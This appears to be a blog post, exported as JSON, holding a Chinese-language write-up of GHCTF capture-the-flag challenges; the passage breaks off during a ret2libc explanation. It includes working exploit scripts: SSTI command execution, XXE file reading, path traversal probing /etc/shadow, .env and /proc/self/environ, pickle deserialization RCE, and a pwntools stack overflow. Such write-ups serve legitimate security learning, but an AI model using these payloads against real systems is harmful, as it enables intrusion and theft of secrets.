{"id":58,"date":"2025-03-06T23:35:32","date_gmt":"2025-03-06T15:35:32","guid":{"rendered":"https:\/\/www.hurkin.top\/?p=58"},"modified":"2025-03-09T17:58:21","modified_gmt":"2025-03-09T09:58:21","slug":"ghctf_writeup","status":"publish","type":"post","link":"https:\/\/www.hurkin.top\/index.php\/2025\/ghctf_writeup\/","title":{"rendered":"GHCTF_WriteUp"},"content":{"rendered":"\r\n

-----by Hurkin<\/p>\r\n\r\n\r\n\r\n

Web<\/h2>\r\n\r\n\r\n\r\n

upload?SSTI!<\/p>\r\n\r\n\r\n\r\n

\u7b80\u5355\u7684waf\u7ed5\u8fc7 \u9ed1\u540d\u5355<\/p>\r\n\r\n\r\n\r\n

['_', 'os', 'subclasses', '__builtins__', '__globals__','flag',]<\/pre>\r\n\r\n\r\n\r\n
\u6240\u4ee5\u7528[request.args.a]\u7ed5\u8fc7<\/p>\r\n\r\n\r\n\r\n
\u7528\u7684sys.modules<\/code> \u95f4\u63a5\u8c03\u7528 os<\/code><\/strong>\uff0c\u627e\u5230warnings.catch_warnings\u7d22\u5f15\u4e3a240<\/p>\r\n\r\n\r\n\r\n
\u4e0a\u4f20a.txt<\/p>\r\n\r\n\r\n\r\n
\"\"<\/figure>\r\n\r\n\r\n\r\n
\u8bbf\u95ee\/file\/a.txt?a=class<\/strong>&b=bases<\/strong>&c=subclasses<\/strong>&d=init<\/strong>&e=globals<\/strong>&f=os&g=ls%20\/<\/p>\r\n\r\n\r\n\r\n
\"\"<\/figure>\r\n\r\n\r\n\r\n
\u7136\u540e\u6700\u540e\u6539\u4e3acat \/flag<\/p>\r\n\r\n\r\n\r\n
\"\"<\/figure>\r\n\r\n\r\n\r\n
(>\ufe4f<)<\/h3>\r\n
\u6e90\u7801\uff1a<\/span><\/p>\r\n
from flask import Flask,request import base64 from lxml import etree import re app = Flask(__name__) @app.route('\/') def index(): \u00a0  return open(__file__).read()  @app.route('\/ghctf',methods=['POST']) def parse(): \u00a0  xml=request.form.get('xml') \u00a0  print(xml) \u00a0  if xml is None: \u00a0 \u00a0 \u00a0  return \"No System is Safe.\" \u00a0  parser = etree.XMLParser(load_dtd=True, resolve_entities=True) \u00a0  root = etree.fromstring(xml, parser) \u00a0  name=root.find('name').text \u00a0  return name or None  if __name__==\"__main__\": \u00a0  app.run(host='0.0.0.0',port=8080)<\/span><\/pre>\r\n
xxe\u8bfb\u6587\u4ef6<\/span><\/p>\r\n
\u6254\u7ed9ai\uff0c\u76f4\u63a5\u62ff\u5230exp:<\/span><\/p>\r\n
import requests<\/span>
url = \"http:\/\/node2.anna.nssctf.cn:28869\/ghctf\"<\/span>
payload = \"\"\"<!DOCTYPE data [<\/span>
  <!ENTITY xxe SYSTEM \"file:\/\/\/flag\"><\/span>
]><\/span>
<root><\/span>
  <name>&xxe;<\/name><\/span>
<\/root><\/span>
\"\"\"<\/span>
response = requests.post(url, data={\"xml\": payload})<\/span>
print(response.text)<\/span><\/pre>\r\n
\u5f97\u5230flag<\/span><\/p>\r\n
NSSCTF{abd2ecb3-4ac0-499d-b245-22e88d210e79}

<\/span><\/pre>\r\n
SQL???<\/span><\/h3>\r\n
\u76f4\u63a5\u4e0asqlmap\u7206<\/span><\/p>\r\n
\r\n\r\n<\/p>\r\n
\"\"<\/figure>\r\n
\r\n\r\n<\/p>\r\n
\"\"<\/figure>\r\n
\r\n\r\n<\/p>\r\n
ez_readfile<\/span><\/h3>\r\n
\u7b2c\u4e00\u6b65\u662fmd5\u76f8\u7b49<\/span><\/p>\r\n
\u76f4\u63a5\u53c2\u8003\u6587\u732e<\/span><\/p>\r\n
[\u53c2\u8003\u6587\u732e<\/span>] \u00a0https:\/\/blog.csdn.net\/2301_79858466\/article\/details\/141176333\u00a0<\/span><\/div>\r\n
a=TEXTCOLLBYfGiJUETHQ4hAcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak&b=TEXTCOLLBYfGiJUETHQ4hEcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak<\/span><\/pre>\r\n
\u7136\u540e \u7136\u540e\u5c31\u6ca1\u601d\u8def\u4e86 \u90a3\u5c31\u5f00\u7206<\/span><\/p>\r\n
import requests<\/span>
TARGET_URL = \"http:\/\/node2.anna.nssctf.cn:28717\"<\/span>
POST_DATA = {<\/span>
  \"a\": \"TEXTCOLLBYfGiJUETHQ4hAcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak\",<\/span>
  \"b\": \"TEXTCOLLBYfGiJUETHQ4hEcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak\"<\/span>
}<\/span>
TEST_PATHS = [<\/span>
  \"\/flag\", \u00a0 \u00a0 \u00a0 \u00a0 # \u7edd\u5bf9\u8def\u5f84<\/span>
  \"..\/..\/..\/..\/flag\", \u00a0 # \u8def\u5f84\u904d\u5386<\/span>
  \"\/flag.txt\", \u00a0 \u00a0 \u00a0 # \u5e38\u89c1\u6269\u5c55\u540d<\/span>
  \"\/etc\/passwd\",<\/span>
  \"\/app\/flag\",<\/span>
  \"\/run\/secrets\/flag\",<\/span>
  \"\/opt\/flag\",<\/span>
  \"\/usr\/local\/flag\",<\/span>
  \"\/docker-entrypoint.sh\",<\/span>
  \"\/tmp\/flag\",<\/span>
  \"tmp\/flag.tmp\",<\/span>
  \"\/var\/tmp\/flag\",<\/span>
  \"\/var\/log\/apache2\/access.log\",<\/span>
  \"\/var\/log\/nginx\/access.log\",<\/span>
  \"\/var\/log\/auth.log\",<\/span>
  \"\/var\/log\/syslog\",<\/span>
  \"\/var\/www\/html\/index.php\",<\/span>
  \"\/var\/www\/html\/config.php\",<\/span>
  \"\/var\/www\/html\/.env\",<\/span>
  \"\/var\/www\/html\/admin\/flag\",<\/span>
  \"\/var\/www\/html\/uploads\/flag\",<\/span>
  \"\/var\/www\/html\/secret\/flag\",<\/span>
  \"\/var\/www\/html\/robots.txt\",<\/span>
  \"\/var\/backups\/flag\",<\/span>
  \"\/var\/backups\/flag.bak\",<\/span>
  \"\/var\/backups\/app.tar.gz\",<\/span>
  \"\/var\/lib\/gnats\/flag\",<\/span>
  \"\/home\/flag\",<\/span>
  \"\/home\/user\/flag\",<\/span>
  \"\/etc\/shadow\",<\/span>
  \"\/etc\/flag\",<\/span>
  \"\/etc\/motd\",<\/span>
  \"\/etc\/hosts\",<\/span>
  \"\/etc\/environment\",<\/span>
  \"\/proc\/self\/environ\",<\/span>
  \"\/proc\/version\",<\/span>
  \"\/tmp\/flag\",<\/span>
  \"\/tmp\/flag.tmp\",<\/span>
  \"\/var\/tmp\/flag\",<\/span>
  \"\/var\/log\/apache2\/access.log\",<\/span>
  \"\/var\/log\/nginx\/access.log\",<\/span>
  \"\/var\/log\/auth.log\",<\/span>
  \"\/var\/log\/syslog\",<\/span>
  \"\/flag.bak\",<\/span>
  \"\/flag.old\",<\/span>
  \"\/flag.swp\",<\/span>
  \"\/flag.swo\",<\/span>
  \".flag\",<\/span>
  \".flag.txt\",<\/span>
  \".flag.php\",<\/span>
  \"._flag\",<\/span>
  \"\/readme.md\",<\/span>
  \"\/notice.txt\",<\/span>
  \"\/hint.txt\",<\/span>
  \"\/secret\",<\/span>
  \"\/admin\/flag\",<\/span>
  \"\/api\/flag\",<\/span>
  \"\/v1\/flag\"<\/span>
]<\/span>
def test_paths():<\/span>
  for path in TEST_PATHS:<\/span>
\u2022<\/span> \u00a0  params = {\"file\": path}<\/span>
\u2022<\/span> \u00a0  try:<\/span>
\u2022<\/span> \u00a0 \u00a0  response = requests.post(<\/span>
\u2022<\/span> \u00a0 \u00a0 \u00a0  TARGET_URL,<\/span>
\u2022<\/span> \u00a0 \u00a0 \u00a0  data=POST_DATA,<\/span>
\u2022<\/span> \u00a0 \u00a0 \u00a0  params=params,<\/span>
\u2022<\/span> \u00a0 \u00a0 \u00a0  timeout=5<\/span>
\u2022<\/span> \u00a0 \u00a0  )<\/span>
\u2022<\/span> \u00a0 \u00a0  if response.status_code == 200:<\/span>
\u2022<\/span> \u00a0 \u00a0 \u00a0  if \"NSSCTF{\" in response.text:<\/span>
\u2022<\/span> \u00a0 \u00a0 \u00a0 \u00a0  print(f\"[+] \u6210\u529f\u83b7\u53d6 Flag: {response.text}\")<\/span>
\u2022<\/span> \u00a0 \u00a0 \u00a0 \u00a0  return<\/span>
\u2022<\/span> \u00a0 \u00a0 \u00a0  elif \"Warning\" in response.text: \u00a0<\/span>
\u2022<\/span> \u00a0 \u00a0 \u00a0 \u00a0  print(\"Warning\")<\/span>
\u2022<\/span> \u00a0 \u00a0 \u00a0  else:<\/span>
\u2022<\/span> \u00a0 \u00a0 \u00a0 \u00a0  print(f\"No Warning\uff1a{path}\")<\/span>
\u2022<\/span> \u00a0  except Exception as e:<\/span>
\u2022<\/span> \u00a0 \u00a0  print(f\"[!] \u6d4b\u8bd5 {path} \u65f6\u51fa\u9519: {str(e)}\")<\/span>
if __name__ == \"__main__\":<\/span>
  test_paths()<\/span><\/pre>\r\n
\u00a0<\/p>\r\n
\r\n\r\n<\/p>\r\n
\"\"<\/figure>\r\n
\r\n\r\n<\/p>\r\n
\"\"<\/figure>\r\n
\r\n\r\n<\/p>\r\n
\uff08\u7b2c\u4e00\u6b21\u8fd8\u6ca1\u770b\u5230 \u592a\u62bd\u8c61\u4e86\uff09<\/span><\/p>\r\n
\r\n\r\n<\/p>\r\n
\"\"<\/figure>\r\n
\r\n\r\n<\/p>\r\n
Popppppp<\/span><\/h3>\r\n
\u62bd\u8c61\u94fe\u5b50\uff0c\u770b\u7684\u5934\u6655\uff0c\u7b49\u7ed3\u675f\u770bwp\u590d\u73b0\u5427<\/span><\/p>\r\n
ezzzz_pickle<\/span><\/h3>\r\n
\u8fd9\u9053\u9898\u975e\u9884\u671f\u597d\u591a \u6211\u5c31\u6253\u51fa\u6765\u4e24\u79cd<\/span><\/p>\r\n
\u5148\u7206\u5f31\u53e3\u4ee4<\/span><\/p>\r\n
admin<\/span>
admin123<\/span><\/pre>\r\n
\u975e\u9884\u671f1\uff1a<\/span><\/p>\r\n
\u7136\u540e\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6 \u76f4\u63a5\u5178\u578b\u975e\u9884\u671f\u8bfb\u73af\u5883\u53d8\u91cf\u79d2\u4e86\uff08\uff09<\/span><\/p>\r\n
\r\n\r\n<\/p>\r\n
\r\n\r\n<\/p>\r\n
\"\"<\/figure>\r\n
\r\n\r\n<\/p>\r\n
\u975e\u9884\u671f2 <\/span><\/p>\r\n
\u8bfb\/docker-entrypoint.sh\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \uff08\u597d\u4e1c\u897f \u5efa\u8bae\u6709\u4e8b\u6ca1\u4e8b\u8bfb\u4e00\u4e0b\uff09<\/span><\/p>\r\n
\r\n\r\n<\/p>\r\n
\r\n\r\n<\/p>\r\n
\"\"<\/figure>\r\n
\r\n\r\n<\/p>\r\n
\u8fd9\u4e2a\u5c31\u662fflag\uff0c\u518d\u8bfb\u4e00\u4e0b<\/span><\/p>\r\n
\u597d\u4e86\u4e0b\u9762\u662f\u9884\u671f\u89e3<\/span><\/p>\r\n
\u5176\u5b9e\u8fd9\u9898\u662f\u8003\u5bdfpickle<\/span><\/p>\r\n
\r\n\r\n<\/p>\r\n
\"\"<\/figure>\r\n
\r\n\r\n<\/p>\r\n
SECRET_key=ajwdopldwjdowpajdmslkmwjrfhgnbbv<\/span> SECRET_iv=asdwdggiouewhgpw<\/span><\/p>\r\n
\u670d\u52a1\u7aef\u6e90\u7801<\/span><\/p>\r\n
from flask import Flask, request, redirect, make_response, render_template<\/span>
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes<\/span>
from cryptography.hazmat.backends import default_backend<\/span>
from cryptography.hazmat.primitives import padding<\/span>
import pickle<\/span>
import hmac<\/span>
import hashlib<\/span>
import base64<\/span>
import time<\/span>
import os<\/span>
app = Flask(__name__)<\/span>
def generate_key_iv():<\/span>
  key = os.environ.get('SECRET_key').encode()<\/span>
  iv = os.environ.get('SECRET_iv').encode()<\/span>
  return key, iv<\/span>
def aes_encrypt_decrypt(data, key, iv, mode='encrypt'):<\/span>
  cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())<\/span>
  if mode == 'encrypt':<\/span>
\u2022<\/span> \u00a0  encryptor = cipher.encryptor()<\/span>
\u2022<\/span> \u00a0  padder = padding.PKCS7(algorithms.AES.block_size).padder()<\/span>
\u2022<\/span> \u00a0  padded_data = padder.update(data.encode()) + padder.finalize()<\/span>
\u2022<\/span> \u00a0  result = encryptor.update(padded_data) + encryptor.finalize()<\/span>
\u2022<\/span> \u00a0  return base64.b64encode(result).decode()<\/span>
  elif mode == 'decrypt':<\/span>
\u2022<\/span> \u00a0  decryptor = cipher.decryptor()<\/span>
\u2022<\/span> \u00a0  encrypted_data_bytes = base64.b64decode(data)<\/span>
\u2022<\/span> \u00a0  decrypted_data = decryptor.update(encrypted_data_bytes) + decryptor.finalize()<\/span>
\u2022<\/span> \u00a0  unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder()<\/span>
\u2022<\/span> \u00a0  unpadded_data = unpadder.update(decrypted_data) + unpadder.finalize()<\/span>
\u2022<\/span> \u00a0  return unpadded_data.decode()<\/span>
users = {<\/span>
  \"admin\": \"admin123\",<\/span>
}<\/span>
def create_session(username):<\/span>
  session_data = {<\/span>
\u2022<\/span> \u00a0  \"username\": username,<\/span>
\u2022<\/span> \u00a0  \"expires\": time.time() + 3600<\/span>
  }<\/span>
  pickled = pickle.dumps(session_data)<\/span>
  pickled_data = base64.b64encode(pickled).decode('utf-8')<\/span>
  key, iv = generate_key_iv()<\/span>
  session = aes_encrypt_decrypt(pickled_data, key, iv, mode='encrypt')<\/span>
  return session<\/span>
def dowload_file(filename):<\/span>
  path = os.path.join(\"static\", filename)<\/span>
  with open(path, 'rb') as f:<\/span>
\u2022<\/span> \u00a0  data = f.read().decode('utf-8')<\/span>
  return data<\/span>
def validate_session(cookie):<\/span>
  try:<\/span>
\u2022<\/span> \u00a0  key, iv = generate_key_iv()<\/span>
\u2022<\/span> \u00a0  pickled = aes_encrypt_decrypt(cookie, key, iv, mode='decrypt')<\/span>
\u2022<\/span> \u00a0  pickled_data = base64.b64decode(pickled)<\/span>
\u2022<\/span> \u00a0  session_data = pickle.loads(pickled_data)<\/span>
\u2022<\/span> \u00a0  if session_data[\"username\"] != \"admin\":<\/span>
\u2022<\/span> \u00a0 \u00a0  return False<\/span>
\u2022<\/span> \u00a0  return session_data if session_data[\"expires\"] > time.time() else False<\/span>
  except:<\/span>
\u2022<\/span> \u00a0  return False<\/span>
@app.route(\"\/\", methods=['GET', 'POST'])<\/span>
def index():<\/span>
  if \"session\" in request.cookies:<\/span>
\u2022<\/span> \u00a0  session = validate_session(request.cookies[\"session\"])<\/span>
\u2022<\/span> \u00a0  if session:<\/span>
\u2022<\/span> \u00a0 \u00a0  data = \"\"<\/span>
\u2022<\/span> \u00a0 \u00a0  filename = request.form.get(\"filename\")<\/span>
\u2022<\/span> \u00a0 \u00a0  if filename:<\/span>
\u2022<\/span> \u00a0 \u00a0 \u00a0  data = dowload_file(filename)<\/span>
\u2022<\/span> \u00a0 \u00a0  return render_template(\"index.html\", name=session['username'], file_data=data)<\/span>
  return redirect(\"\/login\")<\/span>
@app.route(\"\/login\", methods=[\"GET\", \"POST\"])<\/span>
def login():<\/span>
  if request.method == \"POST\":<\/span>
\u2022<\/span> \u00a0  username = request.form.get(\"username\")<\/span>
\u2022<\/span> \u00a0  password = request.form.get(\"password\")<\/span>
\u2022<\/span> \u00a0  if users.get(username) == password:<\/span>
\u2022<\/span> \u00a0 \u00a0  resp = make_response(redirect(\"\/\"))<\/span>
\u2022<\/span> \u00a0 \u00a0  resp.set_cookie(\"session\", create_session(username))<\/span>
\u2022<\/span> \u00a0 \u00a0  return resp<\/span>
\u2022<\/span> \u00a0  return render_template(\"login.html\", error=\"Invalid username or password\")<\/span>
  return render_template(\"login.html\")<\/span>
@app.route(\"\/logout\")<\/span>
def logout():<\/span>
  resp = make_response(redirect(\"\/login\"))<\/span>
  resp.delete_cookie(\"session\")<\/span>
  return resp<\/span>
if __name__ == \"__main__\":<\/span>
  app.run(host=\"0.0.0.0\", debug=False)<\/span><\/pre>\r\n
\r\n\r\n<\/p>\r\n
\"\"<\/figure>\r\n
\r\n\r\n<\/p>\r\n
\u5f80\u91ccsession\u91cc\u585e'reduce<\/span><\/strong>'\u53bbrce \u7136\u540e\u56de\u5e26flag <\/span><\/p>\r\n
\uff08\u662f\u5148\u975e\u9884\u671f\u7684\u76f4\u63a5\u68ad\u4e86\uff09<\/span><\/p>\r\n
REV<\/span><\/h2>\r\n
ASM\uff1fSignin\uff01<\/span><\/h3>\r\n
\u62ff\u5230\u6587\u4ef6\u5148\u62d6\u8fdbdie\uff0c\u53d1\u73b0\u662f\u65e0\u58f3\u3001\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0c\u7528010Editor\u6253\u5f00\u83b7\u5f97\u6e90\u7801<\/span><\/p>\r\n
.MODEL SMALL<\/span>
.STACK 100H<\/span>
.DATA<\/span>
 \u00a0  WELCOME_MSG db 'Welcome to GHCTF!', 0DH, 0AH, '$'<\/span>
 \u00a0  INPUT_MSG db 'Input your flag:', '$'<\/span>
WRONG_MSG db 0DH, 0AH, 'Wrong!', 0DH, 0AH, '$'<\/span>
RIGHT_MSG db 0DH, 0AH, 'Right!', 0DH, 0AH, '$'<\/span>
DATA1 DB 26H,27H,24H,25H,2AH,2BH,28H,00H<\/span>
 \u00a0 \u00a0 \u00a0  DB 2EH,2FH,2CH,2DH,32H,33H,30H,00H<\/span>
 \u00a0 \u00a0 \u00a0  DB 36H,37H,34H,35H,3AH,3BH,38H,39H<\/span>
 \u00a0 \u00a0 \u00a0  DB 3EH,3FH,3CH,3DH,3FH,27H,34H,11H<\/span>
DATA2 DB 69H,77H,77H,66H,73H,72H,4FH,46H<\/span>
 \u00a0 \u00a0 \u00a0  DB 03H,47H,6FH,79H,07H,41H,13H,47H<\/span>
 \u00a0 \u00a0 \u00a0  DB 5EH,67H,5FH,09H,0FH,58H,63H,7DH<\/span>
 \u00a0 \u00a0 \u00a0  DB 5FH,77H,68H,35H,62H,0DH,0DH,50H<\/span>
BUFFER1 db 33 dup(0)<\/span>
BUFFER2 db 33 dup(0)<\/span>
.CODE<\/span>
START:<\/span>
 \u00a0  MOV AX,@DATA<\/span>
 \u00a0  MOV DS,AX<\/span>
 \u00a0  MOV AH,09H<\/span>
 \u00a0  MOV DX,OFFSET WELCOME_MSG<\/span>
 \u00a0  INT 21H<\/span>
 \u00a0  MOV DX,OFFSET INPUT_MSG<\/span>
 \u00a0  INT 21H<\/span>
 \u00a0  MOV AH,0AH<\/span>
 \u00a0  MOV DX,OFFSET BUFFER1<\/span>
 \u00a0  MOV BYTE PTR[BUFFER1],33<\/span>
 \u00a0  INT 21H<\/span>
 \u00a0  CALL DO1<\/span>
 \u00a0  CALL ENC<\/span>
 \u00a0  MOV SI,OFFSET BUFFER1 + 2<\/span>
 \u00a0  MOV DI,OFFSET DATA2<\/span>
 \u00a0  MOV CX,32<\/span>
LOOP1:<\/span>
 \u00a0  MOV AL,[SI]<\/span>
 \u00a0  CMP AL,[DI]<\/span>
 \u00a0  JNE P2<\/span>
 \u00a0  INC SI<\/span>
 \u00a0  INC DI<\/span>
 \u00a0  LOOP LOOP1<\/span>
P1:<\/span>
 \u00a0  MOV AH,09H<\/span>
 \u00a0  LEA DX,RIGHT_MSG<\/span>
 \u00a0  INT 21H<\/span>
 \u00a0  JMP EXIT_PROGRAM<\/span>
P2:<\/span>
 \u00a0  MOV AH,09H<\/span>
 \u00a0  LEA DX,WRONG_MSG<\/span>
 \u00a0  INT 21H<\/span>
\u200b<\/span>
EXIT_PROGRAM: \u00a0<\/span>
 \u00a0  MOV AX,4C00H<\/span>
 \u00a0  INT 21H<\/span>
\u200b<\/span>
DO1 PROC<\/span>
 \u00a0  PUSH SI<\/span>
 \u00a0  PUSH DI<\/span>
 \u00a0  PUSH CX<\/span>
 \u00a0  XOR SI,SI<\/span>
 \u00a0  MOV CX,8<\/span>
SWAP_LOOP:<\/span>
 \u00a0  PUSH CX<\/span>
 \u00a0  MOV DI,SI<\/span>
 \u00a0  ADD DI,4<\/span>
 \u00a0  CMP DI,28<\/span>
 \u00a0  JL NOWRAP<\/span>
 \u00a0  SUB DI,28<\/span>
NOWRAP:<\/span>
 \u00a0  MOV BX,SI<\/span>
 \u00a0  CALL DO2<\/span>
 \u00a0  ADD SI,4<\/span>
 \u00a0  POP CX<\/span>
 \u00a0  LOOP SWAP_LOOP<\/span>
 \u00a0  POP CX<\/span>
 \u00a0  POP DI<\/span>
 \u00a0  POP SI<\/span>
 \u00a0  RET<\/span>
DO1 ENDP<\/span>
\u200b<\/span>
DO2 PROC<\/span>
 \u00a0  PUSH CX<\/span>
 \u00a0  MOV CX,4<\/span>
LOOP3:<\/span>
 \u00a0  MOV AL,DATA1[BX]<\/span>
 \u00a0  MOV AH,DATA1[DI]<\/span>
 \u00a0  MOV DATA1[BX],AH<\/span>
 \u00a0  MOV DATA1[DI],AL<\/span>
 \u00a0  INC BX<\/span>
 \u00a0  INC DI<\/span>
 \u00a0  LOOP LOOP3<\/span>
 \u00a0  POP CX<\/span>
 \u00a0  RET<\/span>
DO2 ENDP<\/span>
\u200b<\/span>
ENC PROC<\/span>
 \u00a0  PUSH CX<\/span>
 \u00a0  MOV SI,OFFSET BUFFER1 + 2<\/span>
 \u00a0  MOV DI,OFFSET DATA1<\/span>
 \u00a0  MOV CX,8<\/span>
LOOP2:<\/span>
 \u00a0  MOV AX,WORD PTR[DI + 1]<\/span>
 \u00a0  XOR WORD PTR[SI],AX<\/span>
 \u00a0  MOV AX,WORD PTR[DI + 2]<\/span>
 \u00a0  XOR WORD PTR[SI + 2],AX<\/span>
 \u00a0  ADD SI,4<\/span>
 \u00a0  ADD DI,4<\/span>
 \u00a0  LOOP LOOP2<\/span>
 \u00a0  POP CX<\/span>
 \u00a0  RET<\/span>
ENC ENDP<\/span>
END START<\/span><\/pre>\r\n
\u6e90\u7801\u7684\u5173\u952e\u903b\u8f91\uff1a<\/span><\/p>\r\n
    \r\n
  1. \r\n
    DO1<\/span><\/strong><\/span>\u548c<\/span>DO2<\/span><\/strong><\/span>\u51fd\u6570\u5bf9DATA1\u8fdb\u884c\u4ea4\u6362\u64cd\u4f5c<\/span><\/p>\r\n<\/li>\r\n
  2. \r\n
    ENC<\/span><\/strong><\/span>\u51fd\u6570\u5c06\u7528\u6237\u8f93\u5165\u4e0e\u4fee\u6539\u540e\u7684DATA1\u8fdb\u884c\u5f02\u6216\u52a0\u5bc6<\/span><\/p>\r\n<\/li>\r\n
  3. \r\n
    \u52a0\u5bc6\u540e\u7684\u8f93\u5165\u4e0eDATA2\u6bd4\u8f83\uff0c\u6b63\u786e\u5219\u663e\u793aRight<\/span><\/p>\r\n<\/li>\r\n<\/ol>\r\n
    exp\u7f16\u5199\u601d\u8def\uff1a<\/span><\/p>\r\n
      \r\n
    1. \r\n
      DO1\u4ea4\u6362DATA1\uff0c\u5f97\u5230\u52a0\u5bc6\u65f6\u4f7f\u7528\u7684DATA1_modified<\/span><\/p>\r\n<\/li>\r\n
    2. \r\n
      \u4f7f\u7528DATA1_modified\u5f02\u6216DATA2\uff0c\u5f97\u5230flag<\/span><\/p>\r\n<\/li>\r\n<\/ol>\r\n
      DATA1 = [<\/span>
       \u00a0  0x26, 0x27, 0x24, 0x25, 0x2A, 0x2B, 0x28, 0x00,<\/span>
       \u00a0  0x2E, 0x2F, 0x2C, 0x2D, 0x32, 0x33, 0x30, 0x00,<\/span>
       \u00a0  0x36, 0x37, 0x34, 0x35, 0x3A, 0x3B, 0x38, 0x39,<\/span>
       \u00a0  0x3E, 0x3F, 0x3C, 0x3D, 0x3F, 0x27, 0x34, 0x11<\/span>
      ]<\/span>
      DATA2 = [<\/span>
       \u00a0  0x69, 0x77, 0x77, 0x66, 0x73, 0x72, 0x4F, 0x46,<\/span>
       \u00a0  0x03, 0x47, 0x6F, 0x79, 0x07, 0x41, 0x13, 0x47,<\/span>
       \u00a0  0x5E, 0x67, 0x5F, 0x09, 0x0F, 0x58, 0x63, 0x7D,<\/span>
       \u00a0  0x5F, 0x77, 0x68, 0x35, 0x62, 0x0D, 0x0D, 0x50<\/span>
      ]<\/span>
      def apply_do1(data):<\/span>
       \u00a0  swaps = []<\/span>
       \u00a0  for i in range(8):<\/span>
       \u00a0 \u00a0 \u00a0  si = i * 4<\/span>
       \u00a0 \u00a0 \u00a0  di = si + 4<\/span>
       \u00a0 \u00a0 \u00a0  if di >= 28:<\/span>
       \u00a0 \u00a0 \u00a0 \u00a0 \u00a0  di -= 28<\/span>
       \u00a0 \u00a0 \u00a0  swaps.append((si, di))<\/span>
      # \u6267\u884c\u4ea4\u6362<\/span>
      for si, di in swaps:<\/span>
       \u00a0  # \u4ea4\u6362 4 \u5b57\u8282\u5757<\/span>
      \u2022<\/span> \u00a0  block_si = data[si:si+4].copy()<\/span>
      \u2022<\/span> \u00a0  block_di = data[di:di+4].copy()<\/span>
      \u2022<\/span> \u00a0  data[si:si+4] = block_di<\/span>
      \u2022<\/span> \u00a0  data[di:di+4] = block_si<\/span>
      return data<\/span>
      def decrypt_flag(data1_modified, data2):<\/span>
       \u00a0  flag = []<\/span>
       \u00a0  for i in range(8):<\/span>
       \u00a0 \u00a0 \u00a0  di = i * 4<\/span>
       \u00a0 \u00a0 \u00a0  # \u83b7\u53d6 DATA1 \u4e2d\u5bf9\u5e94\u7684\u56db\u4e2a\u5f02\u6216\u5b57\u8282<\/span>
       \u00a0 \u00a0 \u00a0  d1 = data1_modified[di + 1]<\/span>
       \u00a0 \u00a0 \u00a0  d2 = data1_modified[di + 2]<\/span>
       \u00a0 \u00a0 \u00a0  d3 = data1_modified[di + 3]<\/span>
       \u00a0 \u00a0 \u00a0  # \u5f02\u6216\u6a21\u677f\uff1ad1, d2, d2, d3<\/span>
       \u00a0 \u00a0 \u00a0  xor_pattern = [d1, d2, d2, d3]<\/span>
       \u00a0 \u00a0 \u00a0  # \u5904\u7406 DATA2 \u7684\u56db\u4e2a\u5b57\u8282<\/span>
       \u00a0 \u00a0 \u00a0  block = data2[i*4 : (i+1)*4]<\/span>
       \u00a0 \u00a0 \u00a0  decrypted = [block[j] ^ xor_pattern[j] for j in range(4)]<\/span>
       \u00a0 \u00a0 \u00a0  flag.extend(decrypted)<\/span>
       \u00a0  # \u8f6c\u6362\u4e3a\u5b57\u7b26\u4e32<\/span>
       \u00a0  return bytes(flag).decode('latin-1', errors='ignore')<\/span>
      if __name__ == \"__main__\":<\/span>
       \u00a0  # \u521b\u5efa DATA1 \u7684\u526f\u672c\u5e76\u8fdb\u884c\u4ea4\u6362\uff08\u6a21\u62df\u52a0\u5bc6\u524d\u7684\u5904\u7406\uff09<\/span>
       \u00a0  data1_modified = DATA1.copy()<\/span>
       \u00a0  apply_do1(data1_modified) \u00a0<\/span>
      # \u89e3\u5bc6\u5f97\u5230 flag<\/span>
      flag = decrypt_flag(data1_modified, DATA2)<\/span>
      print(\"Flag:\", flag)<\/span><\/pre>\r\n
      Flag:NSSCTF{W0w_y0u're_g00d<\/span>@t<\/span><\/em><\/span>@5M!!}<\/span><\/p>\r\n
      PWN<\/span><\/h2>\r\n
      Hello_world<\/span><\/h3>\r\n
      read\u6808\u6ea2\u51fa\uff0c\u6709PIE\u4fdd\u62a4<\/span><\/p>\r\n
      backdoor\u5730\u5740 00000000000009c1 <\/span><\/p>\r\n
      \u76f4\u63a5\u7206\uff0c\u65e0\u8bba\u600e\u4e48\u968f\u673a\u5316\uff0c\u5730\u5740\u7684\u540e\u4e09\u4f4d\u4e0d\u4f1a\u53d8\uff0c\u53ea\u9700\u8981\u7206\u4e00\u4f4d\uff0c1\/16\u7684\u6982\u7387<\/span><\/p>\r\n
      \u521a\u597d\u4e00\u6b21\u8fc7<\/span><\/p>\r\n
      exp:<\/span><\/p>\r\n
      from pwn import *<\/span>
      p = remote('node2.anna.nssctf.cn', 28065)<\/span>
      payload = (b'a'*40 + b'\\xc1\\x09')<\/span>
      p.send(payload)<\/span>
      p.interactive()<\/span><\/pre>\r\n
      \r\n\r\n<\/p>\r\n
      \"\"<\/figure>\r\n
      \r\n\r\n<\/p>\r\n
      ret2libc1<\/span><\/h3>\r\n
      \u6808\u6ea2\u51fa\u3002\u9009\u62e9\u9009\u98795\u65f6\uff0c\u6784\u902072\u5b57\u8282\u7684\u586b\u5145\u8986\u76d6\u8fd4\u56de\u5730\u5740\uff0c\u5229\u7528ROP\u94fe\u8c03\u7528puts<\/code>\u51fd\u6570\u6253\u5370GOT\u8868\u4e2dputs<\/code>\u7684\u5730\u5740\u3002\u63a5\u6536\u6cc4\u9732\u7684\u5730\u5740\u540e\uff0c\u51cf\u53bblibc\u4e2d\u7684puts<\/code>\u504f\u79fb\uff0c\u5f97\u5230libc\u57fa\u5740\uff0c\u4ece\u800c\u786e\u5b9a\u5176\u4ed6\u51fd\u6570\u548c\u5b57\u7b26\u4e32\u7684\u5730\u5740\u3002\u518d\u6b21\u89e6\u53d1\u6f0f\u6d1e\uff0c\u6784\u9020\u65b0\u7684ROP\u94fe\u8c03\u7528system(\"\/bin\/sh\")<\/code>\uff0c\u5176\u4e2d\/bin\/sh<\/code>\u5b57\u7b26\u4e32\u5730\u5740\u548csystem<\/code>\u51fd\u6570\u5730\u5740\u5747\u901a\u8fc7libc\u57fa\u5740\u8ba1